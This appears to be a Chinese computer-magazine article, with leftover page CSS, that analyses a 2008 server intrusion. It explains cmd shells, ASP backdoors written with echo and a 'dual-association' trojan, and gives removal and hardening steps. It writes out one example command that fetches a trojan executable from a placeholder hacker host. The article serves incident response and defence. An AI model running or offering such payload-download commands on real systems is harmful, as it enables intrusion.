0 剖析黑客的木马后门清除双关联木马

★必备知识
　　1.什么是Shell？
　　Shell的中文意思为“壳”，它管理着用户与操作系统之间的交互，可以把它理解为一个命令解释器。它接收用户命令，然后调用相关的应用程序来执行。
　　2.什么又是Cmd Shell？
　　Cmd Shell在这里可以称做系统后门，是黑客利用溢出或其他手段，获取目标计算机命令行的远程控制的权利。（Cmd即：用户在运行中输入“cmd”出现的命令行：如图1）
木马后门清除双关联木马
Cmd Shell
　　3.Cmd Shell是如何被黑客获取的？
　　Cmd Shell大多是当用户计算机存在漏洞时，黑客利用攻击工具进行远程进攻，导致计算机崩溃，从而丢失系统的控制权限（即Cmd Shell）。
　　4.什么是双关联木马？
　　木马在运行后生成两套完全相同的程序（名称和大小不一定一样），文中的“wlloginproxy.exe”程序（图2）和“services.exe”程序会互相扫描（每0.1秒扫描一次），如果发现对方没有启动或者运行时错误，其中一个木马程序会将自身复制，从新制造一个新的木马运行，导致用户无法完全删除。
后门清除双关联木马
木马在运行后生成两套完全相同的程序
　　【略突出】案例
　　时间：2008年2月18日
　　负责工程师：孙佳兴（老孙）
　　地点：青岛园林建设科技有限责任公司
　　现场：公司3D园林规划数据服务器被入侵。黑客采用底层入侵技术，绕过了防火墙和杀毒软件，对服务器数据进行了远程植入木马，并窃取了大量高价值产品信息。
　　【略突出】分析案例
　　听完了青岛园林建设科技有限责任公司管理员的描述后，工程师老孙详细看了公司的服务器配置：
　　服务器配置：主服务器为Window2003 SP1操作系统（补丁已经更新至2月11日最新微软安全公告提示）
　　安装组件：IIS6.0（WEB网页服务）
        　　  MS SQL2003（数据库）
        　　 ISAServer2004（微软的企业级防火墙）
        　　  Prowinde1.7.41(条件限制类杀毒软件)
　　然后，他基本确认了黑客的攻击手段，做出如下分析：
　　服务器采用企业版杀毒软件和入侵防火墙，限制了administrators和低级权限的运行文件的权利。黑客留下的痕迹证明：他采用的是溢出式攻击，并获取了高于administrators的权限。　
　　小知识
　　什么是溢出式攻击？
　　溢出是黑客利用操作系统的漏洞，专门开发一种程序，加上相应的参数运行后，就可以得到你电脑具有管理员资格的控制权，等于你的电脑就是他的了。
【略突出】攻！
　　听完工程师老孙的分析后，公司网络管理员非常迷惑，到底黑客如何利用Cmd Shell下的远程控制进行传输，并进行后门植入的呢？
　　【加细框】下段可以学到：黑客实现远程传输的两种方法
　　老孙分析着残留的文件，基本推测出了黑客的攻击方式：
　　第一种方法：利用Echo命令写ASP后门。
　　小知识
　　Echo命令小解
　　主要功能：简单点说就是开启或关闭批处理命令行在屏幕上的显示，属于内部命令。内部命令就是常驻于内存的命令，在任意路径下输入均可执行。
　　目的：一是避免不需要的命令显示来干扰屏幕；二是在屏幕上给用户显示提示信息。
　　此方法原理：由于目标主机上已经安装了IIS服务，黑客在拥有Cmd Shell的情况下，利用Echo命令制造一个允许传输的ASP后门木马，来管理被入侵的计算机。
　　第二种方法：利用Cmd Shell结合网页进行远程传输。
　　由于黑客在入侵完成后删除了大部分日志，老孙推测还有另外一种方法也可以实现入侵：利用“开始→运行”，输入“cmd”打开命令提示符，输入“start”命令，将木马自动下载到网页缓存中。
　　例如：start itshttp://www.xxx.com/hack/ps.exe
　　在远程Shell中执行上面这个命令后，“ps.exe”已经下载到目标主机的网页缓存目录中了。然后继续通过Cmd命令获得“ps.exe”的具体位置。
小提示
　　对于以服务为启动方式的后门所提供的Shell，其用户身份一般都是System。
　　由于黑客在入侵时候会启动一个IE进程，如果是System身份的Shell，就不会在本地出现窗口，（这种情况符合黑客的入侵行为，避开了防火墙的权限限制）。
　　【略突出】防！
　　入侵分析结束了，接下来就是要解决黑客留下的后门木马。由于木马采用了双关联保护结构，为了清理后门并避免以后再出现类似入侵，老孙还特意做了一份详细的解决方案。
　　【加细框】下段可以学到：双关联木马为什么难以清除
　　黑客在入侵后种植的后门木马程序运行后会生成三个文件，分别是：
　　　　C:/WINDOWS/wlloginproxy.exe
　　　　C:/WINDOWS/Explore32.exe
　　　　C:/WINDOWS/system/services.exe（图3）


这三个文件用的都是HTM文件图标，千万不要以为它们是HTM文件！如果你的系统设置为显示所有文件的扩展名，看看图4，你会发现它们都还有个“.exe”的尾巴，这说明它们是可执行文件！


扩展名里有猫腻
　　这三个文件又分别起什么作用呢？“wlloginproxy.exe”文件用来在启动时加载运行，它是守护进程！
　　小知识
　　守护进程：
　　对木马来说，如果客户端向服务端的某一特定端口提出连接请求，服务端上的相应程序就会自动运行，来应答客户端的请求，我们称这个程序为守护进程。
　　“Explore32.exe”和“services.exe”是干什么的呢？呵呵，它们分别用来和HLP文件（帮助文件）、TXT文件（文本文件）关联，如果你发现并删除了“wlloginproxy.exe”，并不会真正清除了它。一旦打开帮助文件或文本文件，“Explore32.exe”和“services.exe”将被激活！它将再次生成守护进程“wlloginproxy.exe”。这就是服务器一旦被种植了双关联木马，就很难清除干净的原因！
【加细框】下段可以学到：双关联木马的清除方法
　　老孙的方案一：彻底清除双关联木马
　　1.删除文件
　　先删除C:/WINDOWS下的“wlloginproxy.exe”和“Explore32.exe”文件，再删除C:/WINDOWS/system下的“services.exe”文件。如果服务端已经运行，那么就得用进程管理软件找到“wlloginproxy.exe”这个进程，然后点击“终止”，再到C:/WINDOWS下将它删除。
　　网络大补贴
　　推荐两款进程管理软件：
　　(1).大而全：Windows进程管理器 v4.01，提供了700余种进程信息，以颜色分类。下载地址：http://down1.tech.sina.com.cn/download/downContent/2005-12-13/16432.shtml。
　　(2).小而精：Evonsoft Tool汉化绿色版，界面清爽，操作简单。下载地址：http://down1.tech.sina.com.cn/download/down_contents/1223740800/41185.shtml。
　　2.注册表中删除
　　点击“开始→运行”，输入“regedit”打开注册表，到注册表中来删除木马的自启动文件：
　　[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
　　"MainBroad BackManager"="C://WINDOWS//wlloginproxy.exe"
　3.恢复TXT文件关联
　　先下载恢复文件关联的注册表文件（http://work.newhua.com/cfan/200807/恢复REG.rar下载），解压。双击“恢复txt.reg”，点击“确定”导入注册表，将TXT文件关联恢复。
　　4.恢复HLP文件关联
　　双击上步中解压出来的“恢复htp.reg”，点击“确定”即可。
　　下段可以学到：防止Cmd Shell权限丢失的方法
　　老孙的方案二：预防Cmd Shell权限的丢失
　　小提示
　　Cmd Shell的获取大多是利用溢出攻击实现的，经过手工设置可以对溢出攻击进行有效的防御。
　　1.对于Windows 2000/2003系统，打开C:\WINNT\System32(系统安装在C盘)，找到“cmd.exe”，用右键选择“属性”项，在“安全”标签下修改“cmd.exe”的访问权限，只保留刚刚新建立的用户对“cmd.exe”的完全控制权限，将其他用户全部删除，尤其是Everyone。
　　之后，找到“net.exe”文件，按照上述方法进行设置。如果还发现了“net1.exe”，也要设置一样的权限。
　　2.在Windows XP下，“cmd.exe”的“属性”选项里已经没有了“安全”标签。可以点击“开始→运行”，输入“gpedit.msc”，打开“组策略”窗口。在组策略中，依次展开“计算机配置→Windows 设置→软件限制策略”，右击后，选择“创建新的策略”。然后，继续展开“软件限制策略→其他规则”项，右击该项，选择“新键散列规则”。在弹出窗口中点击“浏览”按钮，选择C:\WINNT\System32下的“cmd.exe”文件，设置“安全级别”为“不允许的”。
　　对“net.exe”文件执行同样的操作，进行限制，如图5。


图5 加以限制
　　总结

　　清除木马只是被攻击之后的应急解救措施，学会方案二中如何防止Cmd Shell权限的丢失，不给黑客留下后门，才能保证重要数据的安全性。
.pb{}
.pb textarea{font-size:14px; margin:10px; font-family:"宋体"; background:#FFFFEE; color:#000066}
.pb_t{line-height:30px; font-size:14px; color:#000; text-align:center;}
/* 分页 */
.pagebox{overflow:hidden; zoom:1; font-size:12px; font-family:"宋体",sans-serif;}
.pagebox span{float:left; margin-right:2px; overflow:hidden; text-align:center; background:#fff;}
.pagebox span a{display:block; overflow:hidden; zoom:1; _float:left;}
.pagebox span.pagebox_pre_nolink{border:1px #ddd solid; width:53px; height:21px; line-height:21px; text-align:center; color:#999; cursor:default;}
.pagebox span.pagebox_pre{color:#3568b9; height:23px;}
.pagebox span.pagebox_pre a,.pagebox span.pagebox_pre a:visited,.pagebox span.pagebox_next a,.pagebox span.pagebox_next a:visited{border:1px #9aafe5 solid; color:#3568b9; text-decoration:none; text-align:center; width:53px; cursor:pointer; height:21px; line-height:21px;}
.pagebox span.pagebox_pre a:hover,.pagebox span.pagebox_pre a:active,.pagebox span.pagebox_next a:hover,.pagebox span.pagebox_next a:active{color:#363636; border:1px #2e6ab1 solid;}
.pagebox span.pagebox_num_nonce{padding:0 8px; height:23px; line-height:23px; color:#fff; cursor:default; background:#296cb3; font-weight:bold;}
.pagebox span.pagebox_num{color:#3568b9; height:23px;}
.pagebox span.pagebox_num a,.pagebox span.pagebox_num a:visited{border:1px #9aafe5 solid; color:#3568b9; text-decoration:none; padding:0 8px; cursor:pointer; height:21px; line-height:21px;}
.pagebox span.pagebox_num a:hover,.pagebox span.pagebox_num a:active{border:1px #2e6ab1 solid;color:#363636;}
.pagebox span.pagebox_num_ellipsis{color:#393733; width:22px; background:none; line-height:23px;}
.pagebox span.pagebox_next_nolink{border:1px #ddd solid; width:53px; height:21px; line-height:21px; text-align:center; color:#999; cursor:default;}